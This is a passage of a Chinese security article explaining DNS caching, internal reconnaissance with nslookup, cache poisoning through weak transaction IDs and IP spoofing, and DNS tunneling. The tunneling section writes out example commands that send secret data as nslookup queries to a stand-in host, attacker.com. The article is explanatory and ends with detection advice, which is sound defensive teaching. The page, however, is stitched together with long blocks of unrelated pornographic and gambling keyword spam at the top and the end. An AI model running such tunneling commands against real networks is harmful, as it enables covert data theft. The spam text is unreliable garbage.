精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

DNS系統(tǒng)原理及漏洞利用分析(下)

安全 網(wǎng)站安全
DNS技術(shù)已存在了很長時(shí)間,互聯(lián)網(wǎng)上的每臺(tái)計(jì)算機(jī)都依賴它。然而,利用DNS進(jìn)行內(nèi)網(wǎng)探測、劫持流量并創(chuàng)建隱蔽信道竊取數(shù)據(jù),都是DNS服務(wù)可能造成的安全問題。

接上篇《DNS系統(tǒng)原理及漏洞利用分析(上)

四、DNS緩存

如果每次有任何用戶試圖訪問www.dingxinsec.com.cn,都必須向權(quán)限域名服務(wù)器發(fā)起對(duì)該域名的查詢請(qǐng)求,將會(huì)產(chǎn)生大量的網(wǎng)絡(luò)流量!因此,為了使計(jì)算機(jī)不用在每一次訪問某個(gè)域名時(shí)都向DNS服務(wù)器發(fā)起IP查詢請(qǐng)求,計(jì)算機(jī)上通常會(huì)存儲(chǔ)一個(gè)自身的域名-IP映射庫,這個(gè)映射庫被稱為“DNS緩存”。

  • 加快DNS請(qǐng)求響應(yīng)速度
  • 減少DNS請(qǐng)求在互聯(lián)網(wǎng)上占用的帶寬

但是,DNS緩存方法也存在一些問題,包括:

  • DNS信息的變化需要一定的時(shí)間才能傳播開——這意味著,所有DNS服務(wù)器都將其緩存更新為最新的IP數(shù)據(jù)之前,往往需要一段時(shí)間
  • 攻擊者可能利用DNS緩存發(fā)起攻擊

DNS緩存有以下幾種不同的類型:

  • 瀏覽器DNS緩存:目前大多數(shù)瀏覽器均內(nèi)置了DNS緩存功能,使用本地緩存方式實(shí)現(xiàn)DNS解析通常快速且高效。
  • 操作系統(tǒng)(OS)DNS緩存:目前,大多數(shù)用戶計(jì)算機(jī)操作系統(tǒng)均具備DNS客戶端,可用于管理DNS解析和請(qǐng)求。此類DNS緩存也是本地化的,因此速度快且無需占用帶寬。
  • 遞歸解析DNS緩存:每個(gè)DNS遞歸服務(wù)器中都有DNS緩存,用于存儲(chǔ)可向其發(fā)起下一步請(qǐng)求的IP。
  • [[261205]]

五、DNS常見漏洞

  • 用戶內(nèi)部DNS服務(wù)器會(huì)存儲(chǔ)用戶網(wǎng)絡(luò)域中所有服務(wù)器的內(nèi)部域名與IP,并能夠在無需身份認(rèn)證的情況下實(shí)施訪問。這使得DNS成為攻擊者在內(nèi)網(wǎng)探測階段的重要信息來源。
  • DNS緩存信息并非一定與權(quán)限域名服務(wù)器一致,攻擊者有可能篡改DNS緩存,如果用戶內(nèi)網(wǎng)的DNS服務(wù)器被攻擊篡改,則使用該DNS服務(wù)器發(fā)起域名訪問的計(jì)算機(jī)就會(huì)被誘騙到錯(cuò)誤的服務(wù)器。
  • DNS服務(wù)器可能將內(nèi)網(wǎng)的域名查詢從內(nèi)網(wǎng)工作站遞歸轉(zhuǎn)發(fā)至外網(wǎng)服務(wù)器,攻擊者可能利用此行為創(chuàng)建內(nèi)外網(wǎng)之間的“隱通道”來泄露內(nèi)網(wǎng)數(shù)據(jù)。

1. 利用DNS實(shí)施探測

一旦攻擊者穿透防火墻進(jìn)入用戶內(nèi)網(wǎng)并控制某臺(tái)計(jì)算機(jī),就可以利用內(nèi)網(wǎng)的DNS服務(wù)查找重要的服務(wù)器信息,如郵件服務(wù)器、域名服務(wù)器等各類有價(jià)值的信息。如果攻擊者具備足夠的技術(shù)能力,甚至可能利用內(nèi)部DNS服務(wù)器批量發(fā)送用戶網(wǎng)絡(luò)中區(qū)的信息,此類攻擊被稱為“DNS區(qū)傳輸攻擊”。

以下給出了在Windows操作系統(tǒng)環(huán)境中實(shí)現(xiàn)該攻擊的流程:

  • 打開命令提示符(ctrl+ esc ➡️輸入字母“cmd” ➡️回車)
  • 輸入“ipconfig”,將看到當(dāng)前計(jì)算機(jī)所在的域名、IP地址以及許多其他信息(后續(xù)命令中將會(huì)使用)
  • 鍵入“nslookup[IP]”,將看到正在響應(yīng)請(qǐng)求的DNS服務(wù)器名稱,如果名稱已知,則會(huì)顯示列出名稱和IP地址的DNS記錄
  • 鍵入“nslookup-type=soa [當(dāng)前計(jì)算機(jī)所在域名]”, 執(zhí)行此命令將返回當(dāng)前計(jì)算機(jī)的權(quán)限D(zhuǎn)NS服務(wù)器,如果您嘗試滲透網(wǎng)絡(luò),則不會(huì)很方便。
  • 鍵入“nslookup-type=MX [當(dāng)前計(jì)算機(jī)所在域名]”,通過執(zhí)行該命令,攻擊者可以準(zhǔn)確獲知網(wǎng)內(nèi)郵件服務(wù)器的IP信息。

2. 利用DNS實(shí)施流量重定向

當(dāng)用戶嘗試瀏覽到某個(gè)網(wǎng)站時(shí),他們的計(jì)算機(jī)會(huì)在DNS服務(wù)器中查詢?cè)摼W(wǎng)站的IP。如果DNS服務(wù)器中存有該記錄的緩存,則將直接返回該IP。如果沒有,它會(huì)查詢“上游”DNS服務(wù)器,并將結(jié)果中繼給最終用戶,同時(shí)緩存該信息以供下次使用。

在目前已知的攻擊中,攻擊者已經(jīng)能夠偽造DNS響應(yīng)信息,使其看起來像是來自合法的DNS服務(wù)器。要達(dá)到這一目標(biāo),攻擊者可以利用DNS的三個(gè)弱點(diǎn):

  • DNS對(duì)來自上游服務(wù)器的響應(yīng)僅執(zhí)行非常弱的認(rèn)證。響應(yīng)信息只需包含正確的事務(wù)ID(一個(gè)16位二進(jìn)制數(shù)字(0-65536))。事實(shí)證明,要猜出正確的事務(wù)ID,技術(shù)難度并不大。
  • DNS服務(wù)器接受同時(shí)響應(yīng)多個(gè)查詢請(qǐng)求,因此攻擊者能夠同時(shí)對(duì)事務(wù)ID實(shí)施多次猜測(與暴力破解密碼思路類似)。
  • DNS使用的IP連接很容易被偽造。這意味著攻擊者可以從一臺(tái)計(jì)算機(jī)向DNS服務(wù)器發(fā)送流量,使其看起來像來自另一臺(tái)計(jì)算機(jī),例如另一臺(tái)真實(shí)有效的DNS服務(wù)器。容易被偽造的IP連接類型并不多,不幸的是,DNS恰好是其中之一。

一旦攻擊者成功偽造了DNS響應(yīng)消息,則其可以實(shí)現(xiàn)篡改接收端DNS服務(wù)器的緩存。以下就以一個(gè)典型的場景說明這一攻擊行為可能造成的嚴(yán)重后果:

假設(shè)攻擊者了解到用戶單位使用外部應(yīng)用程序來處理經(jīng)費(fèi)等重要事務(wù)。如果攻擊者篡改了用戶單位DNS服務(wù)器的相關(guān)記錄,則能夠?qū)⒂脩粽T騙至攻擊者偽造的服務(wù)器,誘騙用戶在攻擊者偽造的登陸頁面上錄入其賬號(hào)及口令信息。

更有耐心的攻擊者還可能將真實(shí)流量轉(zhuǎn)發(fā)給真實(shí)的服務(wù)器(充當(dāng)“中間人”),因此用戶就不會(huì)發(fā)現(xiàn)攻擊正在發(fā)生。獲取用戶的身份信息后,攻擊者可以在其他相關(guān)系統(tǒng)上嘗試使用這些身份信息,或者直接出售這些信息。

3. 利用DNS構(gòu)建隱通道

假設(shè)攻擊者已經(jīng)設(shè)法進(jìn)入了用戶單位網(wǎng)絡(luò),控制了一臺(tái)內(nèi)網(wǎng)計(jì)算機(jī),并且已經(jīng)找到了其想要竊取的關(guān)鍵數(shù)據(jù)。如何在不留任何痕跡的情況下將數(shù)據(jù)傳輸?shù)骄W(wǎng)外?攻擊者可能使用一種被稱為“DNS隧道”的技術(shù)來實(shí)現(xiàn)。通常的做法如下:

(1)攻擊者在互聯(lián)網(wǎng)上設(shè)置一個(gè)DNS域(如attacker.com),并創(chuàng)建一個(gè)權(quán)限域名服務(wù)器

(2)在被攻擊者控制的主機(jī)上,攻擊者可以將數(shù)據(jù)分解為小段并將其插入到一系列DNS查詢中,如下所示:

  • nslookup My1secret1.attacker.com
  • nslookup is1that1I1know.attacker.com
  • nsllookup your1data.attacker.com

(3)用戶單位的DNS服務(wù)器將接收這些請(qǐng)求,并將這些請(qǐng)求轉(zhuǎn)發(fā)回attacker.com的權(quán)限域名服務(wù)器。攻擊者在其權(quán)限域名服務(wù)器接收到上述流量后,則可以運(yùn)行程序以提取查詢信息的第一部分(.attacker.com前的內(nèi)容)并將其重新組合,從而將用戶網(wǎng)內(nèi)的數(shù)據(jù)不留痕跡地傳輸?shù)骄W(wǎng)外(此例中傳輸?shù)臄?shù)據(jù)是“My secret is that I know your data.”)。而用戶單位可能永遠(yuǎn)不會(huì)意識(shí)到他們的DNS服務(wù)器被用于泄露自身的數(shù)據(jù)。

六、小結(jié)

DNS技術(shù)已存在了很長時(shí)間,互聯(lián)網(wǎng)上的每臺(tái)計(jì)算機(jī)都依賴它。然而,利用DNS進(jìn)行內(nèi)網(wǎng)探測、劫持流量并創(chuàng)建隱蔽信道竊取數(shù)據(jù),都是DNS服務(wù)可能造成的安全問題。幸運(yùn)的是,通過監(jiān)控DNS服務(wù)器并應(yīng)用安全數(shù)據(jù)分析,目前已有大量技術(shù)可以檢測并阻止這些攻擊。

 

責(zé)任編輯:趙寧寧 來源: 鼎信信息安全測評(píng)
相關(guān)推薦

2019-02-26 15:15:16

DNS漏洞IP

2016-09-29 14:37:39

ImageMagick漏洞分析

2009-07-06 17:47:44

2011-06-16 13:37:43

2017-12-11 17:10:24

2023-07-26 17:13:38

2013-03-22 10:00:14

2021-02-10 09:33:39

漏洞

2020-10-14 09:44:52

漏洞

2017-08-22 13:45:27

2016-05-17 09:42:16

2017-11-08 10:20:10

2015-03-06 17:02:51

2021-08-09 11:15:28

MybatisJavaSpring

2020-10-28 14:58:21

漏洞uTorrent協(xié)議層

2021-11-25 10:36:04

DNS命令Linux

2011-06-16 13:14:18

2009-08-15 10:34:14

安全郵件管理Windows Liv

2009-12-25 11:04:31

Fedora DNS

2023-11-06 18:37:23

虛擬線程編寫
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

av毛片精品| 欧美hdxxxx| 久久精品国产色蜜蜜麻豆| 久久国产精品免费视频| 艳妇乳肉亭妇荡乳av| 日本在线精品| 亚洲精选免费视频| 狠狠色综合欧美激情| 国产情侣呻吟对白高潮| 欧美视频导航| 日韩成人中文字幕| 可以在线看的黄色网址| av电影免费在线观看| 久久久久久综合| 91久久国产自产拍夜夜嗨| 综合激情网五月| 一区二区三区国产精华| 亚洲天堂av电影| 亚洲中文字幕无码一区| 欧美亚洲人成在线| 日韩欧美国产高清91| 日韩不卡一二区| 超碰免费在线观看| 成+人+亚洲+综合天堂| 91免费看片在线| 一级做a爰片久久毛片| 亚洲高清av| 久久福利视频网| 欧美日韩生活片| 羞羞答答一区二区| 欧美精品一区二区三区高清aⅴ | 国产精品1234区| 97在线精品| 国产亚洲一区二区在线| 亚洲天堂网一区二区| 久久99国产精品久久99大师| 欧美一区二区三区四区五区 | 国产成人啪精品午夜在线观看| 欧美xxxxx视频| 亚洲欧美激情视频| 97香蕉碰碰人妻国产欧美 | 麻豆精品视频| 丝袜视频国产在线播放| 成人永久看片免费视频天堂| 亚洲综合在线做性| 国产高清不卡视频| 国产久卡久卡久卡久卡视频精品| 成人精品aaaa网站| 国产精品久久欧美久久一区| 久久99精品网久久| 成人精品视频在线| 99在线无码精品入口| 国产一区在线不卡| 91手机在线视频| 亚洲精品成人电影| 成人性色生活片免费看爆迷你毛片| 91热福利电影| www.xxx国产| 成人自拍视频在线观看| 国产综合色一区二区三区| 色偷偷在线观看| 久久综合久久久久88| 明星裸体视频一区二区| 韩国中文字幕2020精品| 日本一区二区免费在线| 亚洲一区美女| 色女人在线视频| 精品久久久久久亚洲精品 | 国模娜娜一区二区三区| 91手机在线观看| 桃花色综合影院| 日本一区二区视频在线观看| 中文字幕成人一区| 亚洲区欧洲区| 色综合天天综合狠狠| 一区二区成人网| 久久久久九九精品影院| 亚洲级视频在线观看免费1级| 久久人人爽人人人人片| 欧美一级精品| 欧美国产日韩一区二区在线观看| 在线看成人av| 久久国产欧美日韩精品| av一区观看| 国产免费视频在线| 亚洲精品视频免费看| 欧美日韩在线一| 青青在线精品| 亚洲精品福利视频| 欧美激情视频二区| 狠狠久久婷婷| 国产精品女视频| 免费av网站观看| 国产女主播一区| 成人污版视频| 中文字幕一区二区三区av| 日本aa在线观看| 桃子视频成人app| 欧美一区二区免费观在线| 亚洲久久久久久| 亚洲电影影音先锋| 欧美壮男野外gaytube| 国产精品特级毛片一区二区三区| 成人综合在线视频| 一区二区国产日产| 中文字幕 在线观看| 欧美一级二级在线观看| 白丝女仆被免费网站| 午夜日韩av| 国产精品免费一区豆花| 欧美熟妇另类久久久久久不卡| 中文字幕不卡三区| 国产人妻777人伦精品hd| 麻豆久久久久| 亚洲欧洲在线观看| 免费毛片一区二区三区| 国产一区二区三区在线观看免费视频 | 国产精品99久久久| 婷婷精品国产一区二区三区日韩| 182在线视频观看| 91麻豆精品国产自产在线| 国产一区二区三区四区五区六区| 韩日视频一区| 91久久久久久久久久久久久| 国产一级免费在线观看| 欧美日韩精品在线| 师生出轨h灌满了1v1| 亚洲91视频| 国产在线不卡精品| gogogo高清在线观看免费完整版| 丁香五六月婷婷久久激情| 人妻 丝袜美腿 中文字幕| 一区二区在线| 亚洲a在线观看| 日本中文字幕在线视频| 欧美午夜免费电影| 蜜桃传媒一区二区亚洲| 免费在线亚洲| 久久国产精品久久精品国产| 123区在线| 亚洲国产女人aaa毛片在线| 精品97人妻无码中文永久在线| 国内精品国产三级国产a久久| 亚洲日本欧美在线| 成人免费视频观看| 中文字幕亚洲无线码在线一区| 国产情侣呻吟对白高潮| 国产情人综合久久777777| 欧美黄色一级片视频| 视频精品在线观看| 国产99在线|中文| 国产日本在线观看| 欧美三级在线视频| 美女网站视频色| 国产在线不卡一卡二卡三卡四卡| 一区二区三区视频| 国产一区二区三区精品在线观看 | 色姑娘综合网| 国产原创一区| 日韩视频中文字幕| 精品国产18久久久久久| 亚洲国产精品一区二区www| 香港三日本8a三级少妇三级99| 在线成人黄色| 欧美一区二区三区在线播放| 一二区成人影院电影网| 色久欧美在线视频观看| 国产av无码专区亚洲av| 亚洲成人中文在线| 亚洲自拍偷拍一区二区| 久久精品国产在热久久| 国产在线无码精品| 欧美激情15p| 国产精品嫩草影院一区二区| 久操视频在线播放| 精品美女一区二区| 久久久久久久久黄色| 国产精品福利一区| 野战少妇38p| 日韩精品久久理论片| 三年中国中文在线观看免费播放| 秋霞影院一区| 青青久久av北条麻妃黑人| 亚洲xxxxxx| 亚洲精品在线三区| 中文字幕一级片| 亚洲一级不卡视频| 受虐m奴xxx在线观看| 国产一区在线视频| 欧美私人情侣网站| 亚洲深深色噜噜狠狠爱网站| 久久国产精品久久| 国产精品一区二区美女视频免费看 | 蜜臀av一区二区在线免费观看| 久久av高潮av| 成人在线免费小视频| 成人综合色站| 国产91亚洲精品久久久| 久久免费在线观看| 尤物在线视频| 日韩精品免费在线观看| 国产情侣av在线| 色狠狠桃花综合| 欧美日韩中文视频| 亚洲欧美自拍偷拍| 成人免费无遮挡无码黄漫视频| 懂色av一区二区三区蜜臀| 国产九九热视频| 鲁大师成人一区二区三区| 日韩视频一二三| 久久福利综合| 欧美污视频久久久| 免费成人三级| 91九色蝌蚪成人| 日韩精品一级毛片在线播放| 欧美综合第一页| 波多野在线观看| 美女av一区二区三区| 18视频免费网址在线观看| 日韩高清欧美高清| 黄色av网址在线| 日韩精品一区在线观看| 91在线公开视频| 欧美性大战久久| 亚洲 日本 欧美 中文幕| 五月开心婷婷久久| 久久国产免费观看| 亚洲激情图片qvod| 欧美h片在线观看| 天堂91在线| 欧美日韩视频在线| 国产 日韩 欧美 成人| 亚洲精品成人a在线观看| 日本女人性生活视频| 国产精品无码永久免费888| 免费看污片的网站| 久久久久高清精品| 中文字幕免费高清| 久久久一区二区三区捆绑**| 日本丰满少妇裸体自慰 | 欧美日韩国产美| 高潮无码精品色欲av午夜福利| 欧美性猛交xxxxx水多| 可以免费看的av毛片| 五月天久久比比资源色| 日韩精品在线观看免费| 动漫精品一区二区| 亚洲精品男人的天堂| 色综合天天综合| 在线免费一区二区| 欧美性极品少妇| 中文字幕在线播出| 欧美高清性hdvideosex| 96亚洲精品久久久蜜桃| 欧美一区二区三区色| 国产黄色av网站| 亚洲国产精品热久久| 亚洲人成色777777精品音频| 亚洲视频欧洲视频| 91精品大全| 久久国产色av| av福利导福航大全在线| 91chinesevideo永久地址| 韩日精品一区二区| 国产精品在线看| 天堂精品久久久久| 精品在线视频一区二区| 欧美日韩在线播放视频| 欧美亚洲视频一区| 亚洲私人影院| 精品国产一区三区| 日产欧产美韩系列久久99| 99re6在线观看| 国产成人99久久亚洲综合精品| 国产二级一片内射视频播放| 久久精品免视看| 乱h高h女3p含苞待放| 五月综合激情网| 精品乱码一区内射人妻无码| 欧美一级欧美三级在线观看| 天天综合在线视频| 中文字幕亚洲欧美日韩在线不卡| 欧美精品videossex少妇| 欧美专区在线播放| 久久国产精品美女| 欧美aaaaa喷水| 911精品美国片911久久久| 五月丁香综合缴情六月小说| 日韩电影一区二区三区四区| 欧美性猛交乱大交| 国产亚洲欧美在线| 麻豆一区产品精品蜜桃的特点| 日韩欧美一区视频| 成 人 免费 黄 色| 国产午夜精品一区理论片飘花| 中文av资源在线| 国产精品扒开腿爽爽爽视频| 97se亚洲国产一区二区三区| 日日骚一区二区网站| 伊人久久大香线蕉av超碰演员| 尤蜜粉嫩av国产一区二区三区| 成人教育av在线| 成年人二级毛片| 色噜噜狠狠色综合中国| 亚洲爱情岛论坛永久| 在线丨暗呦小u女国产精品| 2019中文字幕在线电影免费| 成人av在线网址| 少妇精品久久久| 久久精品国产sm调教网站演员| 另类小说综合欧美亚洲| av网站免费在线播放| 亚洲综合图片区| 91精品国自产| 在线精品视频视频中文字幕| 高清精品在线| 99热最新在线| 亚洲女同一区| 日韩大片一区二区| 久久亚洲捆绑美女| 日韩欧美激情视频| 日韩精品一区二区三区视频 | 久久av综合| 精品欧美一区免费观看α√| 国产一区二区三区精品视频| 又嫩又硬又黄又爽的视频| 91黄色小视频| 伦理片一区二区三区| 91精品国产高清久久久久久| www.亚洲一二| 国产日本在线播放| 国产成人精品www牛牛影视| 综合五月激情网| 欧美绝品在线观看成人午夜影视| av一区在线观看| 国产精品免费视频xxxx| 日韩.com| 亚洲娇小娇小娇小| 国产精品拍天天在线| 久久久999久久久| 综合136福利视频在线| 日本精品另类| 亚洲国产一区二区精品视频 | 亚洲综合第一区| 欧美视频在线一区二区三区| 国产爆初菊在线观看免费视频网站 | 校园春色 亚洲| 日韩欧美国产三级电影视频| 色呦呦在线观看视频| 国产二区不卡| 精品成人一区| 中文字幕影片免费在线观看| 欧美日韩国产中文精品字幕自在自线| 天堂在线视频观看| 欧美亚洲国产视频| 欧美日韩国产高清电影| 精品亚洲一区二区三区四区| 国产精品电影一区二区| av老司机久久| 国外成人在线视频| 香蕉国产成人午夜av影院| 欧美在线观看视频网站| 亚洲国产高清在线| a在线观看免费| 久久久在线免费观看| 一本久久青青| 在线观看国产中文字幕| 亚洲精品成人悠悠色影视| 日本免费不卡视频| 日韩免费在线观看视频| 91欧美大片| 久久久久久婷婷| 日本精品视频一区二区| 日本韩国在线视频爽| 99中文字幕| 久久激情网站| 538任你躁在线精品视频网站| 亚洲电影天堂av| 韩国三级一区| 国产制服91一区二区三区制服| 99久久免费国产| 亚洲视频在线观看免费视频| 欧美激情精品久久久久久| 国产欧美日韩免费观看| 欧美色图校园春色| 色综合久久六月婷婷中文字幕| 欧美激情免费| 久久成人资源| 国产真实乱子伦精品视频| 97免费在线观看视频| 久久亚洲影音av资源网 | 不卡的av电影| 伊人成人在线观看| 性色av一区二区咪爱| 91亚洲国产成人久久精品| 国产草草浮力影院| 91精品国产91热久久久做人人| xxxxxx欧美| 国产aaa免费视频| 国产精品久久久一本精品 |